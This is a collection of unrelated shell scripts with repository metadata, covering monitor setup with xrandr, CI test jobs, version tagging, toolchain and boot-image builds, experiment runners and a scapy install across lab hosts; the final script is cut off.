583111899f21d03963ccd95539f728f173fa8610
|
Shell
|
jaanos/misc
|
/ubuntu/desktop/desktop.sh
|
UTF-8
| 4,709
| 3.609375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# resolucija laptopa
LAPW=1440
LAPH=900
# outputi
LVDS=LVDS1
VGA=VGA1
# default vrednosti
DEBUG=""
STARTUP=0
FORCE=0
while true; do
case "$1" in
debug)
# debug mode
DEBUG="echo";;
startup)
# startup mode
STARTUP=1;;
force)
# force mode
FORCE=1;;
*)
break;;
esac
shift
done
# na zacetku pocakaj 3 sekunde
if [ "$STARTUP" -eq 1 ]; then
eval "$DEBUG sleep 5"
fi
# podatki o trenutnih nastavitvah
XRANDR=`xrandr`
CONN=`echo "$XRANDR" | egrep "\+| connected"`
CURW=`echo "$XRANDR" | grep "current" | cut -d " " -f 8`
CURH=`echo "$XRANDR" | grep "current" | cut -d " " -f 10 | tr -d ,`
# autodetect
if [ -z "$1" ]; then
if echo "$CONN" | grep "1920x1200" > /dev/null; then
PRESET=24
elif echo "$CONN" | grep "1680x1050" > /dev/null; then
PRESET=22
elif echo "$CONN" | grep "1280x1024" > /dev/null; then
PRESET=dual
else
PRESET=laptop
fi
else
PRESET=$1
fi
# nastavitve za presete
case "$PRESET" in
24)
WIDTH=1920
HEIGHT=1200
OUTPUT=${VGA}
PIC=desktop.bmp
;;
22)
WIDTH=1680
HEIGHT=1050
OUTPUT=${VGA}
PIC=desktop.bmp
;;
dual)
WIDTH=1280
HEIGHT=1024
OUTPUT=${VGA}
PIC=desktop-dual.bmp
;;
proj)
WIDTH=1024
HEIGHT=768
OUTPUT=${VGA}
PIC=desktop-dual.bmp
;;
*)
WIDTH=$LAPW
HEIGHT=$LAPH
OUTPUT=${LVDS}
OFF1=${VGA}
PIC=desktop.bmp
;;
esac
typeset -i TLOFF
WOFF=0
if [ "$OUTPUT" = "${LVDS}" ]; then
# single screen
TOTW=$WIDTH
TOTH=$HEIGHT
LOFF=0
# nastavi single screen
eval "$DEBUG xrandr --output ${LVDS} --primary --auto --panning ${LAPW}x${LAPH}+${LOFF}+0 --output ${OFF1} --off --fb ${WIDTH}x${HEIGHT}"
# prestavi panele
#eval "$DEBUG gconftool-2 --type int --set /apps/panel/toplevels/top_panel_screen0/monitor 0"
#eval "$DEBUG gconftool-2 --type int --set /apps/panel/toplevels/panel_0/monitor 0"
else
# dual screen
TOTH=$(($HEIGHT+$LAPH))
LOFF=$((${WIDTH}-${LAPW}))
if [ -n "$2" ]; then
TLOFF=$2
if [ ${TLOFF} -ge 0 -a ${TLOFF} -le ${LOFF} ]; then
LOFF=${TLOFF}
fi
fi
if [ ${LOFF} -le 0 ]; then
WOFF=$((-${LOFF}))
LOFF=0
fi
TOTW=$((${WIDTH}+${WOFF}))
# nastavi dual screen
eval "$DEBUG xrandr --output ${LVDS} --auto --panning ${LAPW}x${LAPH}+${LOFF}+${HEIGHT} --output ${OUTPUT} --primary --mode ${WIDTH}x${HEIGHT} --panning ${WIDTH}x${HEIGHT}+0+0 --fb ${TOTW}x${TOTH}"
# prestavi panele
#eval "$DEBUG gconftool-2 --type int --set /apps/panel/toplevels/top_panel_screen0/monitor 1"
#if [ ${WIDTH} -lt ${LAPW} ]; then
# eval "$DEBUG gconftool-2 --type int --set /apps/panel/toplevels/panel_0/monitor 0"
#else
# eval "$DEBUG gconftool-2 --type int --set /apps/panel/toplevels/panel_0/monitor 1"
#fi
fi
# prestavi spodnji panel
#eval "$DEBUG gconftool-2 --type int --set /apps/panel/toplevels/bottom_panel_screen0/monitor 0"
#if [ "$FORCE" -eq 1 -o "$TOTW" -ne "$CURW" -a "$TOTH" -ne "$CURH" ]; then
# restartaj compiz in gnome-panel, ce je potrebno
#eval "$DEBUG eval \"(compiz --replace &) > /dev/null 2> /dev/null\""
#eval "$DEBUG pkill -9 gnome-panel"
#eval "$DEBUG eval \"(gnome-panel &) > /dev/null 2> /dev/null\""
#fi
# ponastavi prosojnost panelov
#eval "$DEBUG gconftool-2 --type int --set /apps/panel/toplevels/bottom_panel_screen0/background/opacity 32767"
#eval "$DEBUG gconftool-2 --type int --set /apps/panel/toplevels/bottom_panel_screen0/background/opacity 32768"
#eval "$DEBUG gconftool-2 --type int --set /apps/panel/toplevels/top_panel_screen0/background/opacity 32767"
#eval "$DEBUG gconftool-2 --type int --set /apps/panel/toplevels/top_panel_screen0/background/opacity 32768"
#eval "$DEBUG gconftool-2 --type int --set /apps/panel/toplevels/panel_0/background/opacity 32767"
#eval "$DEBUG gconftool-2 --type int --set /apps/panel/toplevels/panel_0/background/opacity 32768"
# nastavi sliko za ozadje
#eval "$DEBUG gconftool-2 --type string --set /desktop/gnome/background/picture_filename /home/${USER}/Slike/${PIC}"
# ob zagonu startaj terminal
if [ "$STARTUP" -eq 1 ]; then
eval "$DEBUG gnome-terminal --geometry=80x24+0+$(($TOTH-$LAPH)) &"
eval "$DEBUG sleep 10"
if [ "$OUTPUT" != "${LVDS}" ]; then
eval "$DEBUG wmctrl -r \"${USER}@${HOSTNAME}: ~\" -b add,maximized_vert,maximized_horz"
fi
eval "$DEBUG wmctrl -r \"${USER}@${HOSTNAME}: ~\" -b add,sticky"
fi
| true
|
e25505728d6268e1c5c8553ece78763676a969c9
|
Shell
|
jonipham/WZanalysis_release21
|
/XAMPPbase/test/test_mc_ttbar_syst.sh
|
UTF-8
| 2,065
| 3.375
| 3
|
[] |
no_license
|
#!/bin/bash
##############################
# Setup #
##############################
# prepare AthAnalysis or build if not already done so
if [ -f /xampp/build/${AthAnalysis_PLATFORM}/setup.sh ]; then
if [[ -z "${TestArea}" ]]; then
export TestArea=/xampp/XAMPPbase
fi
source /xampp/build/${AthAnalysis_PLATFORM}/setup.sh
else
asetup AthAnalysis,latest,here
if [ -f ${TestArea}/build/${AthAnalysis_PLATFORM}/setup.sh ]; then
source ${TestArea}/build/${AthAnalysis_PLATFORM}/setup.sh
else
mkdir -p ${TestArea}/build && cd ${TestArea}/build
cmake ..
cmake --build .
cd .. && source build/${AthAnalysis_PLATFORM}/setup.sh
fi
fi
# definition of folder for storing test results
TESTDIR=test_job_systematics/
TESTFILE="root://eoshome.cern.ch//eos/user/x/xampp/ci/base/DAOD_SUSY1.15084993._000088.pool.root.1"
LOCALCOPY=DxAOD.root
TESTRESULT=processedNtuple.root
##############################
# Process test sample #
##############################
# create directory for results
mkdir -p ${TESTDIR}
cd ${TESTDIR}
# get kerberos token
if [ -z ${SERVICE_PASS} ]; then
echo "You did not set the environment variable SERVICE_PASS.\n\
Please define in the gitlab project settings/CI the secret variables SERVICE_PASS and CERN_USER."
else
echo "${SERVICE_PASS}" | kinit ${CERN_USER}@CERN.CH
fi
# copy file with xrdcp to local space
if [ ! -f ${LOCALCOPY} ]; then
echo "File not found! Copying it from EOS"
echo xrdcp ${TESTFILE} ${LOCALCOPY}
xrdcp ${TESTFILE} ${LOCALCOPY}
fi
# clean up old job result
if [ -f ${TESTRESULT} ]; then
rm ${TESTRESULT}
fi
# run job
python ${TestArea}/XAMPPbase/python/runAthena.py --filesInput ${LOCALCOPY} --outFile ${TESTRESULT} --evtMax 10000
###################################################
# Raise error if execution failed #
###################################################
if [ $? -ne 0 ]; then
printf '%s\n' "Execution of runAthena.py failed" >&2 # write error message to stderr
exit 1
fi
| true
|
3df9bf4ae0264f0a761dcf6fbd34a29ea95ece90
|
Shell
|
B3nedikt/docker-flutter-android
|
/scripts/replace_version_function.sh
|
UTF-8
| 474
| 3.25
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
replace_version() {
new_version=$1
sed -i '' "s#ENV FLUTTER_VERSION=\"v.*\"#ENV FLUTTER_VERSION=\"$new_version\"#g" Dockerfile
sed -i '' "s#gableroux/flutter:.* #gableroux/flutter:$new_version #g" README.md
git add Dockerfile
git add README.md
git commit -m "Set version to $new_version"
git push --delete origin $new_version || true
git tag -d $new_version
git tag $new_version
git push
git push --tags
}
| true
|
baefd641fd18ccfff97d569dbf33958f48fa1715
|
Shell
|
workjalexanderfox/map-host
|
/lib/common.sh
|
UTF-8
| 1,500
| 3.609375
| 4
|
[] |
no_license
|
#! /bin/bash
export RED='\033[31m' #error
export YELLOW='\033[33m' #warn
export GREEN='\033[0;32m' #info
export BLUE='\033[36m' #log
export INDIGO='\033[0;34m' #debug
export VIOLET='\033[35m' #special
export NC='\033[0m'
COLS=$( tput cols )
color() {
echo -e "${!1}${@:2}${NC}"
}
# can curry like this too
red() {
color RED "$@"
}
repl() { printf "$1"'%.s' $(eval "echo {1.."$(($2))"}"); }
_bookend_() {
_d="[ "
b_=" ]"
message="$_d$@$b_"
message_chars=${#message}
diff=$(($COLS-$message_chars))
echo $message$(repl '–' $diff)
}
_error() {
echo $(color RED "$@")
}
_error_() {
echo $(_error "$(_bookend_ "$@")")
}
to_error () {
while read -r line; do _error $line; done
}
_warn() {
echo $(color YELLOW "$@")
}
_warn_() {
echo $(_warn "$(_bookend_ "$@")")
}
to_warn () {
while read -r line; do _warn $line; done
}
_info() {
echo $(color GREEN "$@")
}
_info_() {
echo $(_info "$(_bookend_ "$@")")
}
to_info () {
while read -r line; do _info $line; done
}
_debug() {
echo $(color BLUE "$@")
}
_debug_() {
echo $(_debug "$(_bookend_ "$@")")
}
to_debug () {
while read -r line; do _debug $line; done
}
_log() {
echo $(color VIOLET "$@")
}
_log_() {
echo $(_log "$(_bookend_ "$1")")
}
to_log () {
while read -r line; do _log $line; done
}
_special() {
echo $(color INDIGO "$@")
}
_special_() {
echo $(_special "$(_bookend_ "$1")")
}
to_special () {
while read -r line; do _special $line; done
}
| true
|
c03df92d6835c800a91fe8c84d7f4460b5644eae
|
Shell
|
kevinLee1984/VbirdsLinuxShell
|
/ch13p01.sh
|
UTF-8
| 347
| 3
| 3
|
[] |
no_license
|
#!/bin/bash
#Filename:ch13p01.sh
# Program
# show whoami and print the dictory where is
#
#History
#2016/02/01 Kevin First release
##envirment path 环境变量
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin
export PATH
whoami=$(whoami)
dict=$(pwd)
echo "My username is $whoami. "
echo "and I'm in $dict"
| true
|
450141c970a38bfbfbcd51c2f3d274bd0f4c54f3
|
Shell
|
nonameentername/pybullet-android
|
/lib_build/make.sh
|
UTF-8
| 876
| 3.203125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
here=`dirname $0`
system=`uname`
arch=`python -c "from sys import maxint; print 'x86' if maxint == 0x7fffffff else 'x64'"`
bullet=$here/../bullet-2.75-rc7/src
dynamics=$bullet/BulletDynamics/libBulletDynamics.a
collision=$bullet/BulletCollision/libBulletCollision.a
math=$bullet/LinearMath/libLinearMath.a
rm -f $here/bullet-*.so $here/bullet-*.dylib $here/bullet.o $here/bullet-*.dll
g++ -I$bullet -c -fPIC $here/bullet.cpp -o $here/bullet.o
if [ $system == "Linux" ]; then
soname="bullet-$arch.so"
echo "Building: $soname"
g++ -shared -Wl,-soname,$soname -o $here/$soname $here/bullet.o $dynamics $collision $math
fi
if [ $system == "Darwin" ]; then
soname="bullet-$arch.dylib"
echo "Building: $soname"
g++ -dynamiclib -o $here/$soname $here/bullet.o $dynamics $collision $math
fi
cp $here/$soname $here/../bullet/bin/$soname
| true
|
03b94fc330b9f254cb6f21da6755b93feae226e3
|
Shell
|
OSGP/open-smart-grid-platform
|
/osgp/protocol-adapter-dlms/osgp-protocol-simulator-dlms/simulator/startSmr51DeviceSimulator.sh
|
UTF-8
| 825
| 3.359375
| 3
|
[
"Apache-2.0",
"GPL-3.0-only",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
# SPDX-FileCopyrightText: Contributors to the GXF project
#
# SPDX-License-Identifier: Apache-2.0
JARTOSTART=dlms-device-simulator/target/dlms-device-simulator-5.1.0-SNAPSHOT-standalone.jar
PORT=1028
usage()
{
echo "Usage: $0 [OPTIONS]"
echo ' '
echo 'Possible OPTIONS:'
echo ' -j <jar to start> The jar to start'
echo ' -p <port> The port for the device simulator'
exit 1
}
while getopts "hj:p:" OPTION
do
case $OPTION in
h)
usage
;;
p)
PORT=$OPTARG
;;
j)
JARTOSTART=$OPTARG
;;
esac
done
java -jar ${JARTOSTART} --deviceidentification.kemacode=TEST${PORT} --deviceidentification.productionyear=00 --deviceidentification.serialnumber=000000 --spring.profiles.active=default,minimumMemory,smr5,smr51 --port=${PORT} --logicalDeviceIds=1
| true
|
dc8281ce550d272f1ea28e13cec515885d9e5748
|
Shell
|
praful-parmar/steps
|
/scripts/push_img
|
UTF-8
| 249
| 2.53125
| 3
|
[] |
no_license
|
#!/bin/bash
IMAGE="test"
pass=$1
echo "loggggginnnnnnnnnning in"
docker login -u praful1997 -p $pass
echo "taaaaaging"
docker tag $IMAGE:$BUILD_TAG praful1997/$IMAGE:$BUILD_TAG
echo "pushhhing image"
docker push praful1997/$IMAGE:$BUILD_TAG
| true
|
4c7550671267b17b7d831ef4f021d72534a2d042
|
Shell
|
limiao06/DSTC4
|
/bash_scripts/msiip_nsvc_tracker_prob.sh
|
UTF-8
| 1,713
| 2.53125
| 3
|
[] |
no_license
|
# msiip_nsvc_tracker.sh feature iteration
# msiip_nsvc_tracker.sh uB 5
set -u
logfile=../output/msiip_out/msiip_nsvc_out/msiip_nsvc_${1}_prob_result.txt
rm $logfile
python ../scripts/dstc_thu/msiip_nsvc_tracker.py --dataset dstc4_dev --dataroot ../data --ontology ../scripts/config/ontology_dstc4.json --model_dir ../output/models/NSVC_models/nsvc_${1}_model/ --trackfile ../output/msiip_out/msiip_nsvc_out/msiip_nsvc_${1}_t80_hr.json
python ../scripts/score.py --dataset dstc4_dev --dataroot ../data/ --trackfile ../output/msiip_out/msiip_nsvc_out/msiip_nsvc_${1}_t80_hr.json --scorefile ../output/msiip_out/msiip_nsvc_out/msiip_nsvc_${1}_t80_hr.score --ontology ../scripts/config/ontology_dstc4.json
echo ../output/msiip_out/msiip_nsvc_out/msiip_nsvc_${1}_t80_hr.score > $logfile
python ../scripts/report.py --scorefile ../output/msiip_out/msiip_nsvc_out/msiip_nsvc_${1}_t80_hr.score >> $logfile
for it in $(seq 0 $[${2}-1])
do
python ../scripts/dstc_thu/msiip_nsvc_tracker.py --dataset dstc4_dev --dataroot ../data/ --model_dir ../output/models/NSVC_models/nsvc_${1}_model_prob_boost/${it}/ --trackfile ../output/msiip_out/msiip_nsvc_out/msiip_nsvc_${1}_prob_boost${it}_t80_hr.json --ontology ../scripts/config/ontology_dstc4.json
python ../scripts/score.py --dataset dstc4_dev --dataroot ../data/ --trackfile ../output/msiip_out/msiip_nsvc_out/msiip_nsvc_${1}_prob_boost${it}_t80_hr.json --scorefile ../output/msiip_out/msiip_nsvc_out/msiip_nsvc_${1}_prob_boost${it}_t80_hr.score --ontology ../scripts/config/ontology_dstc4.json
echo 'boost' ${it} >> $logfile
python ../scripts/report.py --scorefile ../output/msiip_out/msiip_nsvc_out/msiip_nsvc_${1}_prob_boost${it}_t80_hr.score >> $logfile
done
| true
|
e4651a55615d9f8db60fcca3c48af60421e92fab
|
Shell
|
daratmonkey/Stool
|
/pythonify/scapyify.py
|
UTF-8
| 293
| 2.875
| 3
|
[] |
no_license
|
#!/bin/bash
wget https://www.github.com/secdev/scapy/archive/v2.4.2.tar.gz
ID=$(($UID - 3000))
for x in 130 235 1 66; do
scp -r v2.4.2.tar.gz root@10.40.$ID.$x:
ssh root@10.40.$ID.$x 'tar -zxvf v2.4.2.tar.gz'
ssh root@10.40.$ID.$x 'cd scapy-2.4.2;python3 ./setup.py install'
done
| true
|
f8563520f7890ba7d93d2a09a10a1601dd420bed
|
Shell
|
klausjunker/debian-install
|
/aptitude/jk0aptitude
|
UTF-8
| 632
| 2.75
| 3
|
[] |
no_license
|
#!/bin/bash
#-----------------------------------------------------------------------------
jklog debianinstall "start: $0 --- "
#-----------------------------------------------------------------------------
jkecho "install aptitude"
jklog debianinstall "0-1: aptitude"
apt-get install aptitude -y
jkecho "aptitude update: main contrib non-free"
sed -i 's/main[ \t]*$/main contrib non-free/g' /etc/apt/sources.list
aptitude update
#-----------------------------------------------------------------------------
jklog debianinstall "ende: $0 --- "
#-----------------------------------------------------------------------------
| true
|
9ba26f5021b1730dc9ac24069cd3acf85e864027
|
Shell
|
SymbIoT-Systems/symbmote
|
/packaging/avr-344-beta/gcc/build.sh
|
UTF-8
| 5,607
| 3.59375
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
#
# Duplicates what is in tools/platforms/msp430/toolchain*
#
# BUILD_ROOT is assumed to be the same directory as the build.sh file.
#
# set TINYOS_ROOT_DIR to the head of the tinyos source tree root.
# used to find default PACKAGES_DIR.
#
#
# Env variables used....
#
# TINYOS_ROOT_DIR head of the tinyos source tree root. Used for base of default repo
# PACKAGES_DIR where packages get stashed. Defaults to $(TINYOS_ROOT_DIR)/packages
# REPO_DEST Where the repository is being built (no default)
# DEB_DEST final home once installed.
# CODENAME which part of the repository to place this build in.
#
# REPO_DEST must contain a conf/distributions file for reprepro to work
# properly. One can be copied from $(TINYOS_ROOT_DIR)/tools/repo/conf.
#
COMMON_FUNCTIONS_SCRIPT=../../functions-build.sh
source ${COMMON_FUNCTIONS_SCRIPT}
SOURCENAME=gcc
SOURCEVERSION=4.8.1
ATMELVERSION=3.4.4
GMPVERSION=5.0.2
MPFRVERSION=3.0.0
MPCVERSION=0.9
BUILDDIR=build
SOURCEDIRNAME=${SOURCENAME}
SOURCEFILENAME=avr-${SOURCENAME}-${SOURCEVERSION}.tar.bz2
GMPDIRNAME=gmp-${GMPVERSION}
GMPFILENAME=gmp-${GMPVERSION}.tar.bz2
MPFRDIRNAME=mpfr-${MPFRVERSION}
MPFRFILENAME=mpfr-${MPFRVERSION}.tar.bz2
MPCDIRNAME=mpc-${MPCVERSION}
MPCFILENAME=mpc-${MPCVERSION}.tar.gz
#PACKAGE_RELEASE=1
PREFIX=/usr
MAKE="make -j4"
download()
{
check_download ${GMPFILENAME}
if [ "$?" -eq "1" ]; then
wget https://ftp.gnu.org/gnu/gmp/${GMPFILENAME}
fi
check_download ${MPFRFILENAME}
if [ "$?" -eq "1" ]; then
wget https://ftp.gnu.org/gnu/mpfr/${MPFRFILENAME}
fi
check_download ${MPCFILENAME}
if [ "$?" -eq "1" ]; then
wget http://www.multiprecision.org/mpc/download/${MPCFILENAME}
fi
check_download ${SOURCEFILENAME}
if [ "$?" -eq "1" ]; then
wget http://distribute.atmel.no/tools/opensource/Atmel-AVR-GNU-Toolchain/${ATMELVERSION}/${SOURCEFILENAME}
fi
}
unpack()
{
tar -xjf ${SOURCEFILENAME}
tar -xjf ${GMPFILENAME}
tar -xjf ${MPFRFILENAME}
tar -xzf ${MPCFILENAME}
cd ${SOURCEDIRNAME}
ln -s ../${GMPDIRNAME} gmp
ln -s ../${MPFRDIRNAME} mpfr
ln -s ../${MPCDIRNAME} mpc
patch -p0 <../bugfix60486.patch
}
build()
{
set -e
(
cd ${SOURCEDIRNAME}
pushd gcc/config/avr/
sh genopt.sh avr-mcus.def > avr-tables.opt
cat avr-mcus.def | awk -f genmultilib.awk FORMAT="Makefile" > t-multilib
popd
#don't force old autoconf
sed -i 's/ \[m4_fatal(\[Please use exactly Autoconf \]/ \[m4_errprintn(\[Please use exactly Autoconf \]/g' ./config/override.m4 || task_error "sed failed"
autoconf
mkdir -p ${BUILDDIR}
cd ${BUILDDIR}
CFLAGS="-Os -g0 -s" ../configure \
LDFLAGS="-L${PREFIX}/lib" CPPFLAGS=""\
--target=avr\
--prefix=${PREFIX}\
--libdir=${PREFIX}/lib\
--libexecdir=${PREFIX}/lib\
--infodir=${PREFIX}/share/info\
--mandir=${PREFIX}/share/man\
--enable-languages="c,c++"\
--with-dwarf2\
--enable-doc\
--disable-libada\
--disable-libssp\
--disable-nls\
--with-ld=${PREFIX}/bin/avr-ld\
--with-as=${PREFIX}/bin/avr-as\
--with-avrlibc=yes
${MAKE} all
#../${SOURCEDIRNAME}/configure --prefix=${PREFIX} --disable-libssp --disable-nls --enable-languages=c,c++ --infodir=${PREFIX}/share/info --libdir=${PREFIX}/lib --libexecdir=${PREFIX}/lib --mandir=${PREFIX}/share/man --target=avr --with-ld=/usr/bin/avr-ld --with-as=/usr/bin/avr-as
#${MAKE}
)
}
installto()
{
cd ${SOURCEDIRNAME}/${BUILDDIR}
${MAKE} tooldir=/usr DESTDIR=${INSTALLDIR} install
#cleanup
rm -f ${INSTALLDIR}/usr/lib/libiberty.a
rm -f ${INSTALLDIR}/usr/lib64/libiberty.a
rm -rf ${INSTALLDIR}/usr/share/info
rm -rf ${INSTALLDIR}/usr/share/man/man7
#strip executables
cd ${INSTALLDIR}/usr/bin/
strip *
cd ${INSTALLDIR}/usr/lib/gcc/avr/${SOURCEVERSION}/
for binary in cc1 cc1plus collect2 lto-wrapper lto1 "install-tools/fixincl"
do
strip $binary
done
}
package_deb(){
package_deb_from ${INSTALLDIR} ${SOURCEVERSION}-${PACKAGE_RELEASE} gcc.control
}
package_rpm(){
package_rpm_from ${INSTALLDIR} ${SOURCEVERSION} ${PACKAGE_RELEASE} ${PREFIX} gcc.spec
}
cleanbuild(){
remove ${SOURCEDIRNAME}
remove ${GMPDIRNAME}
remove ${MPCDIRNAME}
remove ${MPFRDIRNAME}
}
cleandownloaded(){
remove ${SOURCEFILENAME} ${GMPFILENAME} ${MPCFILENAME} ${MPFRFILENAME}
}
cleaninstall(){
remove ${BUILDDIR}
remove ${INSTALLDIR}
}
#main funcition
BUILD_ROOT=$(pwd)
case $1 in
download)
download
;;
clean)
cleanbuild
;;
veryclean)
cleanbuild
cd ${BUILD_ROOT}
cleandownloaded
;;
deb)
setup_package_target ${SOURCENAME}-avr-tinyos-beta ${SOURCEVERSION} ${PACKAGE_RELEASE}
cd ${BUILD_ROOT}
download
cd ${BUILD_ROOT}
unpack
cd ${BUILD_ROOT}
build
cd ${BUILD_ROOT}
installto
cd ${BUILD_ROOT}
package_deb
cd ${BUILD_ROOT}
cleaninstall
;;
rpm)
setup_package_target avr-${SOURCENAME}-tinyos ${SOURCEVERSION} ${PACKAGE_RELEASE}
cd ${BUILD_ROOT}
download
cd ${BUILD_ROOT}
unpack
cd ${BUILD_ROOT}
build
cd ${BUILD_ROOT}
installto
cd ${BUILD_ROOT}
package_rpm
cd ${BUILD_ROOT}
cleaninstall
;;
local)
setup_local_target
cd ${BUILD_ROOT}
download
cd ${BUILD_ROOT}
unpack
cd ${BUILD_ROOT}
build
cd ${BUILD_ROOT}
installto
;;
*)
echo -e "\n./build.sh <target>"
echo -e " local | rpm | deb | clean | veryclean | download"
esac
| true
|
1148e014d035ae93c6b055a58c1a7fe6274174f1
|
Shell
|
lunar-linux/lunar
|
/libs/recovery.lunar
|
UTF-8
| 5,125
| 4.125
| 4
|
[] |
no_license
|
#!/bin/bash
# #
# This code is written for Lunar Linux, see #
# http://lunar-linux.org #
# #
############################################################
# #
# $FUNCTIONS/recovery #
# includes rebuild_status_files, replace_status_file, #
# check_status_files #
# 20020528 #
# #
############################################################
# #
# Copyrighted Kagan Kongar 2002 under GPLv2 #
# #
############################################################
# function : rebuild_status_files
# usage : rebuild_status_files
# purpose : rebuild the accidentally deleted status files
rebuild_status_files() {
debug_msg "rebuild_status_files ($@)"
if ! query \
"Do you want to re-construct the status files from install logs?" y; then
message "${PROBLEM_COLOR}Unable to continue without status files" \
"${DEFAULT_COLOR}"
exit 1
fi
if ! [ -d "$INSTALL_LOGS" ]; then
message "${PROBLEM_COLOR}Unable to continue without install logs " \
"${DEFAULT_COLOR}"
exit 1
fi
message "${MESSAGE_COLOR}Re-creating status files." \
"${DEFAULT_COLOR}"
LOG_FILES=$(ls -rt $INSTALL_LOGS)
for MODULE_NAME in $LOG_FILES; do
COUNTS=3
REAL_NAME=$MODULE_NAME
unset SECTION
while [ "$COUNTS" -gt "0" ]; do
REAL_NAME=$(echo $REAL_NAME | cut -d "-" -f -"$COUNTS")
SECTION=$(find_section $REAL_NAME)
if [ -n "$SECTION" ]; then
((COUNTS++))
VERSION=$(echo $MODULE_NAME | cut -d "-" -f "$COUNTS"-)
SIZE=$(find_module_size $REAL_NAME $VERSION)
DATE=$(ls -l $INSTALL_LOGS/$REAL_NAME-$VERSION --time-style=+%Y%m%d | awk '{print $6}')
# adjusted add_module code that echos the DATE field ;^)
lock_file $MODULE_STATUS &&
lock_file $MODULE_STATUS_BACKUP &&
{
OLD_STATE=$(get_module_state $REAL_NAME "installed")
grep -v "^$REAL_NAME:" "$MODULE_STATUS" > $MODULE_STATUS_BACKUP
if [ -n "$OLD_STATE" ]; then
OLD_STATE="+$OLD_STATE"
fi
echo "$REAL_NAME:$DATE:installed$OLD_STATE:$VERSION:$SIZE" >> $MODULE_STATUS_BACKUP &&
cp $MODULE_STATUS_BACKUP $MODULE_STATUS
}
unlock_file $MODULE_STATUS_BACKUP &&
unlock_file $MODULE_STATUS &&
message "Added: $REAL_NAME-$VERSION ($SIZE) ($DATE)"
break
fi
((COUNTS--))
done
done
message "${MESSAGE_COLOR}Success!!${DEFAULT_COLOR}\n"
}
# function : replace_status_file
# usage : replace_status_file
# purpose : cp $MODULE_STATUS_BACKUP $MODULE_STATUS via query
replace_status_file() {
debug_msg "replace_status_file ($@)"
if ! [ -f "$MODULE_STATUS_BACKUP" ]; then rebuild_status_files; return; fi
message "${PROBLEM_COLOR}Unable to find MODULE_STATUS file" \
"${MODULE_COLOR}$MODULE_STATUS" \
"${DEFAULT_COLOR}"
if query "Do you want to use the backup?" y; then
if ! [ -f "$MODULE_STATUS_BACKUP" ]; then rebuild_status_files; fi
if `cp $MODULE_STATUS_BACKUP $MODULE_STATUS`; then
message "${MESSAGE_COLOR}Success!!" \
"${DEFAULT_COLOR}"
else
message "${PROBLEM_COLOR}Unsuccessful :=( No more operation!!" \
"${DEFAULT_COLOR}"
exit 1
fi
else
message "${PROBLEM_COLOR}Unable to continue without that :=("\
"No more operation!!" \
"${DEFAULT_COLOR}"
exit 1
fi
}
# function : check_status_files
# usage : check_status_files
# purpose : checks the avail of MODULE_STATUS and MODULE_STATUS_BACKUP files
check_status_files() {
debug_msg "check_status_files ($@)"
if ! [ -f "$MODULE_STATUS" ]; then replace_status_file; fi
if ! [ -f "$MODULE_STATUS" ]; then echo "Unknown error!!!"; exit; fi
if ! [ -f "$MODULE_STATUS_BACKUP" ]; then
message "${PROBLEM_COLOR}Unable to find MODULE_STATUS_BACKUP file" \
"${MODULE_COLOR}$MODULE_STATUS_BACKUP" \
"${DEFAULT_COLOR}"
if `cp $MODULE_STATUS $MODULE_STATUS_BACKUP`; then
message "${MESSAGE_COLOR}MODULE_STATUS is successfully copied" \
"to MODULE_STATUS_BACKUP" \
"${DEFAULT_COLOR}"
else
message "${PROBLEM_COLOR}Unsuccessful while copying" \
"MODULE_STATUS to MODULE_STATUS_BACKUP :=( " \
"No more operation!!" \
"${DEFAULT_COLOR}"
exit 1
fi
fi
}
| true
|
bca5be7729c23a0053c47328549545f382a2fe7f
|
Shell
|
EchoQian/PhoebeM
|
/boot_images/build/ms/build_all.sh
|
UTF-8
| 2,536
| 2.890625
| 3
|
[] |
no_license
|
#===============================================================================
#
# CBSP Buils system
#
# General Description
# build shell script file.
#
# Copyright (c) 2013,2014 by QUALCOMM, Incorporated.
# All Rights Reserved.
# QUALCOMM Proprietary/GTDR
#
#-------------------------------------------------------------------------------
#
# $Header: //components/rel/boot.bf/3.0.c8/boot_images/build/ms/build_all.sh#1 $
# $DateTime: 2015/03/19 01:58:37 $
# $Author: pwbldsvc $
# $Change: 7697609 $
# EDIT HISTORY FOR FILE
#
# This section contains comments describing changes made to the module.
# Notice that changes are listed in reverse chronological order.
#
# when who what, where, why
# -------- --- -----------------------------------------------------------
# 11/07/14 sk Added for 8929 build command
# 04/01/14 lm Added for 8936 build command
# 03/07/14 jz Added for 9x45 build command
# 10/07/13 ck Removed targets that are not in Bear family
# 09/12/13 ck Adding 8916
# 07/23/13 plc Adding 8994
# 06/26/13 plc Adding 8092 compilation
# 05/13/12 sy Adding 9x35 compiilation
# 05/06/13 plc Adding 8x62 compilation
# 04/23/12 sy Adding 8084 and 8974 compilation
# 04/04/12 sy Remove 8x10,8x26 compilation
# 04/16/12 dh Enable 8084
# 09/18/12 sy Enable 8x10 ,8x26 compilation
# 07/20/12 sy Initial Draft
#===============================================================================
#!/bin/bash
#---- Set up default paths -----------
export BUILD_ROOT=../..
export CORE_BSP_ROOT=$BUILD_ROOT/core/bsp
export TOOLS_SCONS_ROOT=$BUILD_ROOT/tools/build/scons
export PARTITION_TOOLS_ROOT=$BUILD_ROOT/core/storage/tools/nandbootmbn
#-------- set the build dir and reset the command line parameter ----
build_dir=`dirname $0`
cd $build_dir
#if setenv.sh exist, run it
[ -f $BUILD_ROOT/build/ms/setenv.sh ] && source setenv.sh || echo "Warning: SetEnv file not existed"
sh build.sh TARGET_FAMILY=8916 $@
if [[ $? != 0 ]]; then
echo -e "Build_All: Fail to compile 8916. Exiting ....."
exit 1
fi
sh build.sh TARGET_FAMILY=9x45 $@
if [[ $? != 0 ]]; then
echo -e "Build_All: Fail to compile 9x45. Exiting ....."
exit 1
fi
sh build.sh TARGET_FAMILY=8936 $@
if [[ $? != 0 ]]; then
echo -e "Build_All: Fail to compile 8936. Exiting ....."
exit 1
fi
sh build.sh TARGET_FAMILY=8929 $@
if [[ $? != 0 ]]; then
echo -e "Build_All: Fail to compile 8929. Exiting ....."
exit 1
fi
| true
|
c449e4df5b8178781025c9b83b953830e4f48a79
|
Shell
|
CoinXu/libuv-example
|
/docker.sh
|
UTF-8
| 189
| 2.515625
| 3
|
[] |
no_license
|
name=libuv
